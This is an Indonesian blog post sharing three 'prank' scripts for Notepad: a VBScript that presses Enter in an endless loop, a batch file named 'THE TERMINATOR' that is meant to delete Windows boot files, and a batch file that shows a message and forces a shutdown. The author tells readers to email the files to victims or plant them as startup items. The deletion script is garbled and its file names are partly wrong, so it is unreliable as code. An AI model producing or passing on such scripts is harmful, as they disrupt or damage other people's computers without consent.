Mr.doogel

Selasa

Scrip Jailin Orang


Bagi yang sukak iseng, atau ngisengin teman ini kukasik hadiah buat kalain scrip jail buat ngerjain orang, gak perlu mengunakan proram seperti java tau visual basic, ne cukup kita jal;anin hanya dengan menggunakan note pad aja.........
nah gak ribet kan, tapi buat catatan kalian semua, kamu hanya perlu mengcopy pastekan saja file tersebut ,tapi akan lebih baik klu kamu ketik karna terdapat perbedaan tanda kutip antara word dengan note pad,
okeeee, sekarang kita mulai gengan scrip yang pertama
hehehehe....
ane udah kena getahnya nigh waktu ada seekor temen gw yg ngirim file ini...
virus ini bisa buat kamu mencet tombol ENTER sampe MAMPUS...
yg kamu butuhkan cuma NOTEPAD!!

1.okeiii...lets start on beibeh!?
copy paste text dibawah ke notepad terus save as dengan nama "anything.vbs" (tanpa tanda kutang).
udah!? itu aja, gampang khan!? chaong.gif

Set wshShell = wscript.CreateObjec t("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

2.Disini saya akan menuliskan tentang script mainan saya yang biasa saya ngerjain orang

PERINGATAN!!

FILE INI BISA MEMBUAT KOMPUTER KAMU RUSAK TOTAL!!
SAYA NGGAK BERTANGGUNG JAWAB KALO HAL DIATAS TERJADI...

okey...lets start on..
copy-paste teks dibawah ini kedalam Notepad..
terus save as dengan nama "THE TERMINATOR.bat" (yg pastix nggak pake tanda kutip..)
lalu kirim file ini via email ato buat sebagai startup dikomputer lawan...
apabila si KORBAN membuka file tersebut, maka PCnya bakaln ter-restart dan nggak akan kembali lagi... Devil.gif


< % del c:\ntdetect.sys del c:\ntldr.sys del c:\msconfig.sys %systemroot%bootmgr%users%cmd=restart.com end %>
@ echoend

3.oke yang sekarang saya akan melanjutkan mainan yang ke 3, yang ketiga ini dinamakan si samsul, kenapa di namakan samsul karena secript ini pas di save as harus dinamai samsul kalu tidak dinamain samsul dia tidak mau script yang aneh ok lanjut aja bro langsung

copy-paste teks dibawah kedalam Notepad..
kemudian save as dengan nama samsul.bat
terus kirim file geblek ini via email ato dijadiin starup ajaah..
gampang khan...



@echo off
msg * (pesan kamu)
shutdown -c (pesan kamu lagi) -s

contohx sodara2:

@echo off
msg * Dasar kampret!?
shutdown -c "Selamat!? Kamu udah dikerjai oleh MTV Samsul" -s


0 komentar:

Posting Komentar